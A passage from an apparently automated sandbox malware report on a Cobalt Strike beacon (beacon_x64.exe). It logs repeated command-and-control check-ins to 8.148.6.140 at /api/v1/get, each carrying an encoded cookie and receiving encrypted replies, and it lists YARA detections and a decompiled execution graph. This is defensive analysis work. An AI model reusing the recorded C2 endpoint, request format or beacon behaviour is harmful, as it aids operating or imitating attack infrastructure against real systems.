          Date: Fri, 10 Jan 2025 08:28:44 GMT
          Server: nginx
          Content-Length: 280
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 39 37 44 31 39 54 7a 4e 43 2b 6b 66 70 74 61 34 6b 6e 43 37 39 7a 42 34 62 6e 66 4f 57 35 67 6f 4a 6a 73 75 67 54 30 78 35 4f 56 37 4d 79 65 42 4e 46 63 76 54 36 37 6e 44 42 52 6f 52 6e 66 4d 75 64 4f 53 33 36 46 45 65 54 58 78 4f 4d 35 6f 6c 42 64 49 77 67 54 51 75 53 4e 37 66 44 36 47 6a 72 48 6f 66 4f 52 7a 75 4e 41 4e 70 74 57 5a 4d 50 78 45 69 4f 41 4f 35 32 6d 31 66 6c 41 68 55 6a 77 35 36 79 79 57 45 73 77 68 45 4f 62 71 62 34 6e 6c 33 6c 6b 77 6b 43 4c 7a 6f 59 70 6e 79 6d 49 56 62 78 41 6b 6f 62 6d 6e 48 46 55 37 54 57 4d 67 65 63 33 6b 58 71 32 66 66 78 41 2f 4e 70 43 51 76 43 54 67 44 68 65 42 51 79 72 45 39 32 77 2b 4d 34 31 76 6a 66 79 32 44 61 42 4f 30 59 41 42 4d 4f 30 47 4b 41 4f 30 4c 5a 61 58 63 35 66 44 65 42 5a 7a 45 56 4b 38 38 71 64 31 63 59 6e 58 6d 64 4b 59 51 65 7a 4d 61 69 48 6a 41 45 6e 44 38 51 3d 3d
          Data Ascii: 97D19TzNC+kfpta4knC79zB4bnfOW5goJjsugT0x5OV7MyeBNFcvT67nDBRoRnfMudOS36FEeTXxOM5olBdIwgTQuSN7fD6GjrHofORzuNANptWZMPxEiOAO52m1flAhUjw56yyWEswhEObqb4nl3lkwkCLzoYpnymIVbxAkobmnHFU7TWMgec3kXq2ffxA/NpCQvCTgDheBQyrE92w+M41vjfy2DaBO0YABMO0GKAO0LZaXc5fDeBZzEVK88qd1cYnXmdKYQezMaiHjAEnD8Q==


          Session IDSource IPSource PortDestination IPDestination Port
          128192.168.2.6501178.148.6.14080
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:44.368863106 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:28:45.325989008 CET485INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:28:45 GMT
          Server: nginx
          Content-Length: 300
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 54 69 69 78 45 2b 4d 49 63 66 77 74 57 38 71 53 72 35 41 67 37 6f 47 69 5a 62 52 30 69 58 75 63 6b 4e 55 33 63 6d 2f 65 4a 72 58 4b 30 42 61 49 77 54 38 62 6f 61 6f 37 79 51 53 62 73 69 76 76 49 44 72 39 68 79 32 6b 41 4a 2b 69 67 72 7a 56 74 54 32 64 59 6f 54 78 35 71 41 38 38 63 52 49 70 37 46 7a 33 36 4a 53 52 55 54 65 30 52 50 6e 65 50 44 7a 71 56 42 64 43 56 4b 62 50 37 42 76 6f 52 4d 48 37 6d 51 6e 44 72 6c 69 67 54 65 4c 41 34 46 75 70 6d 6d 4e 2f 4f 53 72 4f 68 52 76 66 50 56 6b 6c 70 78 4c 2b 74 4b 56 58 6d 6c 48 49 53 41 7a 4f 75 6d 4a 4d 66 52 47 4b 44 57 2f 37 53 68 67 50 78 43 38 70 68 4a 6e 38 54 76 48 58 49 6b 72 50 65 69 66 44 67 6d 4f 69 2b 47 4a 4e 4e 54 7a 73 46 63 48 74 4e 31 71 6e 41 41 69 51 42 4d 32 71 52 7a 71 73 54 64 43 54 4f 52 56 49 4d 47 71 52 47 51 43 74 4b 46 53 50 75 31 33 31 63 71 6a 2f 62 6c 6d 41 70 59 68 72 47 35 53 44 6e 41 32 57 62 63 36 51 7a 67 3d
          Data Ascii: TiixE+MIcfwtW8qSr5Ag7oGiZbR0iXuckNU3cm/eJrXK0BaIwT8boao7yQSbsivvIDr9hy2kAJ+igrzVtT2dYoTx5qA88cRIp7Fz36JSRUTe0RPnePDzqVBdCVKbP7BvoRMH7mQnDrligTeLA4FupmmN/OSrOhRvfPVklpxL+tKVXmlHISAzOumJMfRGKDW/7ShgPxC8phJn8TvHXIkrPeifDgmOi+GJNNTzsFcHtN1qnAAiQBM2qRzqsTdCTORVIMGqRGQCtKFSPu131cqj/blmApYhrG5SDnA2Wbc6Qzg=


          Session IDSource IPSource PortDestination IPDestination Port
          129192.168.2.6501188.148.6.14080
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:45.437031984 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination Port
          130192.168.2.6501198.148.6.14080
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:49.562189102 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:28:50.534225941 CET505INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:28:50 GMT
          Server: nginx
          Content-Length: 320
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 30 56 77 49 37 72 66 58 44 2f 35 62 43 79 79 69 71 42 6d 31 77 75 4b 49 7a 39 39 64 71 4e 7a 32 59 33 75 31 52 68 4c 66 50 30 69 2b 4e 6a 6b 35 57 4c 58 57 51 75 33 6d 52 68 68 63 2f 50 52 57 6c 78 6e 63 68 53 31 62 2b 34 70 2b 51 69 4e 67 50 61 2f 4f 78 4d 48 31 64 6e 34 72 2f 59 76 53 68 79 63 31 4c 37 42 4a 53 35 66 7a 68 79 78 4f 48 4e 77 51 50 57 49 6b 4c 79 65 4d 68 59 41 75 4c 56 42 30 2f 4d 4e 6b 4b 6f 66 65 2f 6c 77 2f 56 36 36 53 34 64 5a 53 38 50 75 70 30 49 71 32 63 2f 38 73 53 35 33 35 6a 44 33 35 78 4e 2f 50 6f 45 58 66 48 67 69 62 58 74 57 47 4b 38 4e 65 39 4a 7a 6f 33 36 71 67 75 6f 6d 41 38 61 33 75 38 38 55 35 71 72 58 57 70 63 58 44 71 75 6a 6d 6e 50 78 53 56 77 6b 58 4a 52 72 55 53 4d 51 2b 6b 4d 6f 47 73 33 75 62 38 36 54 6e 51 35 4c 70 58 5a 76 36 55 74 33 38 37 6c 4a 7a 35 47 48 69 48 54 51 79 6d 52 46 6e 52 66 59 4a 38 6d 78 53 79 63 34 62 66 38 78 44 69 51 5a 63 5a 2b 74 6e 4b 68 61 63 66 7a 53 31 65 39 4b 74 6b 4c 35 79
          Data Ascii: 0VwI7rfXD/5bCyyiqBm1wuKIz99dqNz2Y3u1RhLfP0i+Njk5WLXWQu3mRhhc/PRWlxnchS1b+4p+QiNgPa/OxMH1dn4r/YvShyc1L7BJS5fzhyxOHNwQPWIkLyeMhYAuLVB0/MNkKofe/lw/V66S4dZS8Pup0Iq2c/8sS535jD35xN/PoEXfHgibXtWGK8Ne9Jzo36qguomA8a3u88U5qrXWpcXDqujmnPxSVwkXJRrUSMQ+kMoGs3ub86TnQ5LpXZv6Ut387lJz5GHiHTQymRFnRfYJ8mxSyc4bf8xDiQZcZ+tnKhacfzS1e9KtkL5y


          Session IDSource IPSource PortDestination IPDestination Port
          131192.168.2.6501208.148.6.14080
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:50.659215927 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:28:51.627871990 CET421INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:28:51 GMT
          Server: nginx
          Content-Length: 236
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 72 62 4d 66 43 42 55 55 48 63 46 51 30 72 2b 54 73 51 55 41 7a 32 5a 64 49 2f 6d 7a 67 51 6d 37 4a 62 6d 73 51 6f 74 4b 67 42 43 51 6f 70 63 72 6a 41 67 45 4e 76 4d 61 50 63 35 2b 69 67 65 54 47 43 35 66 30 4c 57 36 48 42 42 59 65 48 4c 77 66 7a 4a 57 76 43 69 73 64 76 4e 2f 50 53 57 4e 73 31 7a 41 47 50 61 4a 45 2b 78 6b 73 2b 64 4f 2b 62 73 77 46 41 43 34 6c 74 43 4c 6b 6d 56 57 4a 4b 30 67 76 77 77 63 7a 50 34 4f 35 67 77 55 4a 6c 59 4f 61 2b 66 66 31 6a 2f 75 6e 73 6e 59 4f 72 6e 59 69 74 78 4a 75 38 4c 63 77 49 4b 51 67 35 4f 4f 30 61 43 6a 42 36 73 4d 33 6f 66 78 73 47 47 6a 54 4d 61 48 6a 37 7a 5a 65 4d 71 79 62 51 6d 71 50 45 32 52 76 63 4a 6d 41 58 5a 44 79 34 2b 41 6a 5a 38 39 76 41 38 3d
          Data Ascii: rbMfCBUUHcFQ0r+TsQUAz2ZdI/mzgQm7JbmsQotKgBCQopcrjAgENvMaPc5+igeTGC5f0LW6HBBYeHLwfzJWvCisdvN/PSWNs1zAGPaJE+xks+dO+bswFAC4ltCLkmVWJK0gvwwczP4O5gwUJlYOa+ff1j/unsnYOrnYitxJu8LcwIKQg5OO0aCjB6sM3ofxsGGjTMaHj7zZeMqybQmqPE2RvcJmAXZDy4+AjZ89vA8=


          Session IDSource IPSource PortDestination IPDestination Port
          132192.168.2.6501218.148.6.14080
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:51.749761105 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination Port
          133192.168.2.6501228.148.6.14080
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:55.860958099 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:28:56.808726072 CET549INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:28:56 GMT
          Server: nginx
          Content-Length: 364
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 33 64 45 76 37 45 62 68 48 76 56 4a 4b 45 4e 47 62 65 32 6a 75 50 66 62 44 35 2f 2f 51 45 6c 45 49 6b 33 54 4b 6b 38 63 53 69 69 65 4a 4f 4c 54 73 42 69 37 33 79 48 38 49 4e 68 53 4c 30 35 75 51 2f 38 61 79 37 61 6e 43 4b 58 2f 65 70 31 77 62 75 48 51 6f 51 55 62 36 59 46 72 4e 30 49 43 56 32 78 31 33 51 4f 73 46 4d 6f 53 37 77 41 4e 2f 69 65 33 36 39 48 30 74 6a 2f 59 72 72 32 37 37 41 2b 42 2b 5a 6d 57 35 7a 47 48 70 57 4c 4e 31 42 44 43 4b 46 5a 73 53 53 32 41 77 42 6a 30 6e 44 62 57 73 2b 32 47 62 6e 70 76 44 79 6e 76 2f 2b 47 41 45 36 55 31 68 4d 63 74 37 58 71 5a 64 4b 68 63 48 6f 66 65 41 6a 6d 66 52 43 54 56 71 45 55 76 43 7a 65 63 61 6a 6c 36 65 6e 4f 6b 30 75 35 5a 56 53 46 53 77 68 37 4a 6c 48 33 58 41 39 67 67 43 70 79 48 34 77 59 2b 46 69 7a 50 57 69 49 53 66 36 2b 58 77 4a 53 64 79 6c 33 44 4a 56 4c 72 53 37 2b 4b 45 6a 4d 6b 69 64 36 75 31 33 50 42 79 74 78 67 77 48 33 6e 72 70 55 62 6a 52 2b 42 75 68 68 61 71 68 69 4f 73 75 56 52 4e 72 61 45 57 6f 50 64 63 46 38 37 66 55 54 48 7a 4a [TRUNCATED]
          Data Ascii: 3dEv7EbhHvVJKENGbe2juPfbD5//QElEIk3TKk8cSiieJOLTsBi73yH8INhSL05uQ/8ay7anCKX/ep1wbuHQoQUb6YFrN0ICV2x13QOsFMoS7wAN/ie369H0tj/Yrr277A+B+ZmW5zGHpWLN1BDCKFZsSS2AwBj0nDbWs+2GbnpvDynv/+GAE6U1hMct7XqZdKhcHofeAjmfRCTVqEUvCzecajl6enOk0u5ZVSFSwh7JlH3XA9ggCpyH4wY+FizPWiISf6+XwJSdyl3DJVLrS7+KEjMkid6u13PBytxgwH3nrpUbjR+BuhhaqhiOsuVRNraEWoPdcF87fUTHzJhvTHwVwZVy0qMYqIPR1MIgWmI=


          Session IDSource IPSource PortDestination IPDestination Port
          134192.168.2.6501238.148.6.14080
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:56.927175045 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:28:57.919013023 CET185INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:28:57 GMT
          Server: nginx
          Content-Length: 128
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Jan 10, 2025 09:28:57.919183016 CET128INData Raw: 2f 6f 49 54 54 77 32 67 55 57 46 75 33 62 79 35 64 4c 71 39 57 51 38 38 6e 4e 43 62 4c 43 63 32 74 74 49 30 6d 4b 4c 36 30 6e 38 36 47 38 75 35 58 38 78 56 44 6c 57 4e 51 64 43 7a 54 62 50 71 59 73 4d 52 45 43 77 52 67 30 33 45 66 77 4d 45 6a 41
          Data Ascii: /oITTw2gUWFu3by5dLq9WQ88nNCbLCc2ttI0mKL60n86G8u5X8xVDlWNQdCzTbPqYsMRECwRg03EfwMEjAnymCOD80jW3QtV85cmIwlrpXognPopdDdtcL06ibQqjbK7


          Session IDSource IPSource PortDestination IPDestination Port
          135192.168.2.6501248.148.6.14080
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:58.042006969 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:29:02.417078018 CET337INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:29:01 GMT
          Server: nginx
          Content-Length: 152
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 62 58 65 42 76 4d 6a 6c 74 6f 4a 53 54 57 34 2b 78 59 50 4d 30 6b 47 46 75 47 65 37 32 43 50 6a 72 6c 4b 62 38 43 74 33 68 62 50 62 36 54 74 59 6b 63 38 39 31 46 59 6d 39 58 61 50 6b 6f 4d 32 51 61 6d 66 30 34 5a 2b 45 4a 61 36 74 37 4e 52 61 33 2f 4b 6a 53 37 72 39 6d 52 77 6e 6d 54 41 47 4b 67 47 56 77 2f 43 69 59 67 42 4e 74 79 70 78 46 41 38 52 4f 53 77 68 55 73 6a 79 48 2f 66 69 35 6b 6a 57 73 55 36 71 4e 52 43 79 79 31 38 4a 58 6d 49 77 41 3d 3d
          Data Ascii: bXeBvMjltoJSTW4+xYPM0kGFuGe72CPjrlKb8Ct3hbPb6TtYkc891FYm9XaPkoM2Qamf04Z+EJa6t7NRa3/KjS7r9mRwnmTAGKgGVw/CiYgBNtypxFA8ROSwhUsjyH/fi5kjWsU6qNRCyy18JXmIwA==
          Jan 10, 2025 09:29:02.417567015 CET337INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:29:01 GMT
          Server: nginx
          Content-Length: 152
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 62 58 65 42 76 4d 6a 6c 74 6f 4a 53 54 57 34 2b 78 59 50 4d 30 6b 47 46 75 47 65 37 32 43 50 6a 72 6c 4b 62 38 43 74 33 68 62 50 62 36 54 74 59 6b 63 38 39 31 46 59 6d 39 58 61 50 6b 6f 4d 32 51 61 6d 66 30 34 5a 2b 45 4a 61 36 74 37 4e 52 61 33 2f 4b 6a 53 37 72 39 6d 52 77 6e 6d 54 41 47 4b 67 47 56 77 2f 43 69 59 67 42 4e 74 79 70 78 46 41 38 52 4f 53 77 68 55 73 6a 79 48 2f 66 69 35 6b 6a 57 73 55 36 71 4e 52 43 79 79 31 38 4a 58 6d 49 77 41 3d 3d
          Data Ascii: bXeBvMjltoJSTW4+xYPM0kGFuGe72CPjrlKb8Ct3hbPb6TtYkc891FYm9XaPkoM2Qamf04Z+EJa6t7NRa3/KjS7r9mRwnmTAGKgGVw/CiYgBNtypxFA8ROSwhUsjyH/fi5kjWsU6qNRCyy18JXmIwA==


          Click to jump to process

          Click to jump to process

          Target ID:0
          Start time:03:24:53
          Start date:10/01/2025
          Path:C:\Users\user\Desktop\beacon_x64.exe
          Wow64 process (32bit):false
          Commandline:"C:\Users\user\Desktop\beacon_x64.exe"
          Imagebase:0x400000
          File size:328'704 bytes
          MD5 hash:AF51E1DBA9C7DA4626AE4AAC6E61A070
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4563882801.0000000000CB0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.4563882801.0000000000CB0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2114029429.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
          Reputation:low
          Has exited:false

          Reset < >

            Execution Graph

            Execution Coverage:3%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:7.2%
            Total number of Nodes:1000
            Total number of Limit Nodes:49
            execution_graph 16979 76ec64 16980 77e284 malloc RtlFreeHeap 16979->16980 16982 76ec8a _DllMainCRTStartup 16980->16982 16981 76ecc5 16982->16981 16994 76ecc0 16982->16994 16995 77f620 16982->16995 16983 77e244 free RtlFreeHeap 16983->16981 16985 76eccf 16986 76ed13 16985->16986 16988 76ecdc _DllMainCRTStartup 16985->16988 16987 77e244 free RtlFreeHeap 16986->16987 16989 76ed1b 16987->16989 17010 77f7bc 16988->17010 17023 76d590 16989->17023 16992 76ed06 17017 77f4e0 16992->17017 16994->16983 16996 77f548 16995->16996 16997 77f577 16996->16997 16999 77f5a2 16996->16999 16998 780d18 _errno RtlFreeHeap 16997->16998 17000 77f57c _invalid_parameter_noinfo _ioinit _ftelli64 16998->17000 17027 784fcc 16999->17027 17000->16985 17002 77f5a7 17003 77f5b4 17002->17003 17004 77f5c1 17002->17004 17007 780d18 _errno RtlFreeHeap 17003->17007 17005 77f5c6 17004->17005 17006 77f5e8 17004->17006 17008 780d18 _errno RtlFreeHeap 17005->17008 17035 785100 17006->17035 17007->17000 17008->17000 17011 77f7e6 17010->17011 17012 77f7fc _invalid_parameter_noinfo _ftelli64 17010->17012 17011->17012 17013 77f7f7 17011->17013 17015 77f809 _ftelli64 17011->17015 17012->16992 17014 780d18 _errno RtlFreeHeap 17013->17014 17014->17012 17096 77f62c 17015->17096 17018 77f501 17017->17018 17020 77f515 _ftelli64 17017->17020 17019 780d18 _errno RtlFreeHeap 17018->17019 17022 77f506 _invalid_parameter_noinfo _ftelli64 17019->17022 17020->17022 17112 77f464 17020->17112 17022->16994 17024 76d5a4 _DllMainCRTStartup 17023->17024 17024->17024 17167 76bee8 17024->17167 17026 76d63a 17026->16981 17028 782d8c _lock RtlFreeHeap 17027->17028 17029 784fe5 17028->17029 17030 78506d 17029->17030 17031 785061 _fcloseall 17029->17031 17034 782e58 _mtinitlocknum RtlFreeHeap 17029->17034 17050 784bb4 17029->17050 17032 7837a8 _malloc_crt RtlFreeHeap 17030->17032 17031->17002 17032->17031 17034->17029 17036 78513a 17035->17036 17037 785151 17036->17037 17049 7852f2 17036->17049 17055 7899ac 17036->17055 17038 780d18 _errno RtlFreeHeap 17037->17038 17041 785156 _invalid_parameter_noinfo 17038->17041 17039 785357 17067 789978 17039->17067 17041->17000 17043 7852b2 17043->17037 17061 789ae0 17043->17061 17045 7852ee 17046 789ae0 _openfile RtlFreeHeap 17045->17046 17045->17049 17047 785311 17046->17047 17048 789ae0 _openfile RtlFreeHeap 17047->17048 17047->17049 17048->17049 17049->17037 17049->17039 17051 784bc2 17050->17051 17052 784bd5 17050->17052 17053 782d8c _lock RtlFreeHeap 17051->17053 17054 784bca 17053->17054 17054->17029 17056 7899b4 17055->17056 17057 780600 strtoxl RtlFreeHeap 17056->17057 17060 7899d8 _invalid_parameter_noinfo 17056->17060 17058 7899ec 17057->17058 17059 780d18 _errno RtlFreeHeap 17058->17059 17058->17060 17059->17060 17060->17043 17062 789ae8 17061->17062 17063 780600 strtoxl RtlFreeHeap 17062->17063 17064 789b11 17063->17064 17065 780d18 _errno RtlFreeHeap 17064->17065 17066 789b26 _invalid_parameter_noinfo 17064->17066 17065->17066 17066->17045 17070 789814 17067->17070 17069 7899a5 17069->17041 17071 78983d 17070->17071 17072 789855 17070->17072 17073 780d18 _errno RtlFreeHeap 17071->17073 17072->17071 17074 789882 17072->17074 17076 789842 _invalid_parameter_noinfo _unlock_fhandle 17073->17076 17077 7898f0 17074->17077 17076->17069 17082 77ee10 17077->17082 17079 78991e 17079->17076 17080 78991a 17080->17079 17081 77e244 free RtlFreeHeap 17080->17081 17081->17079 17083 77ee36 17082->17083 17084 77ee4e 17082->17084 17085 780d18 _errno RtlFreeHeap 17083->17085 17084->17083 17087 77ee53 __crtIsPackagedApp 17084->17087 17086 77ee3b _invalid_parameter_noinfo 17085->17086 17086->17080 17088 77eea6 17087->17088 17089 77ee95 17087->17089 17090 7837a8 _malloc_crt RtlFreeHeap 17088->17090 17091 780cc8 _dosmaperr RtlFreeHeap 17089->17091 17092 77eeb1 17090->17092 17091->17086 17092->17086 17093 780cc8 _dosmaperr RtlFreeHeap 17092->17093 17094 77eee4 17093->17094 17095 77e244 free RtlFreeHeap 17094->17095 17095->17086 17099 77f65a 17096->17099 17100 77f669 _invalid_parameter_noinfo 17096->17100 17097 77f664 17098 780d18 _errno RtlFreeHeap 17097->17098 17098->17100 17099->17097 17099->17100 17104 77f6a6 _setmbcp 17099->17104 17100->17012 17101 78139c _snprintf RtlFreeHeap 17101->17104 17103 784a54 _fileno RtlFreeHeap 17103->17104 17104->17100 17104->17101 17104->17103 17105 785434 _flush RtlFreeHeap 17104->17105 17106 784e5c 17104->17106 17105->17104 17107 784e79 17106->17107 17111 784e9e 17106->17111 17108 784a54 _fileno RtlFreeHeap 17107->17108 17107->17111 17109 784e90 17108->17109 17110 785434 _flush RtlFreeHeap 17109->17110 17110->17111 17111->17104 17113 77f48d 17112->17113 17114 77f479 17112->17114 17116 784e5c _flush RtlFreeHeap 17113->17116 17125 77f47e _invalid_parameter_noinfo 17113->17125 17115 780d18 _errno RtlFreeHeap 17114->17115 17115->17125 17117 77f498 17116->17117 17126 784dd8 17117->17126 17120 784a54 _fileno RtlFreeHeap 17121 77f4aa 17120->17121 17130 784c58 17121->17130 17123 77f4b1 17124 77e244 free RtlFreeHeap 17123->17124 17123->17125 17124->17125 17125->17022 17127 784de7 17126->17127 17129 77f4a2 17126->17129 17128 77e244 free RtlFreeHeap 17127->17128 17127->17129 17128->17129 17129->17120 17131 784c71 17130->17131 17134 784c89 17130->17134 17133 780ca8 __doserrno RtlFreeHeap 17131->17133 17132 784cf2 17136 780ca8 __doserrno RtlFreeHeap 17132->17136 17135 784c76 17133->17135 17134->17132 17138 784cbb 17134->17138 17139 780d18 _errno RtlFreeHeap 17135->17139 17137 784cf7 17136->17137 17140 780d18 _errno RtlFreeHeap 17137->17140 17141 7892b0 __lock_fhandle RtlFreeHeap 17138->17141 17147 784c7e _invalid_parameter_noinfo _unlock_fhandle 17139->17147 17140->17147 17142 784cc2 17141->17142 17143 784cd9 17142->17143 17144 784cce 17142->17144 17146 780d18 _errno RtlFreeHeap 17143->17146 17148 784d1c 17144->17148 17146->17147 17147->17123 17149 7895ec 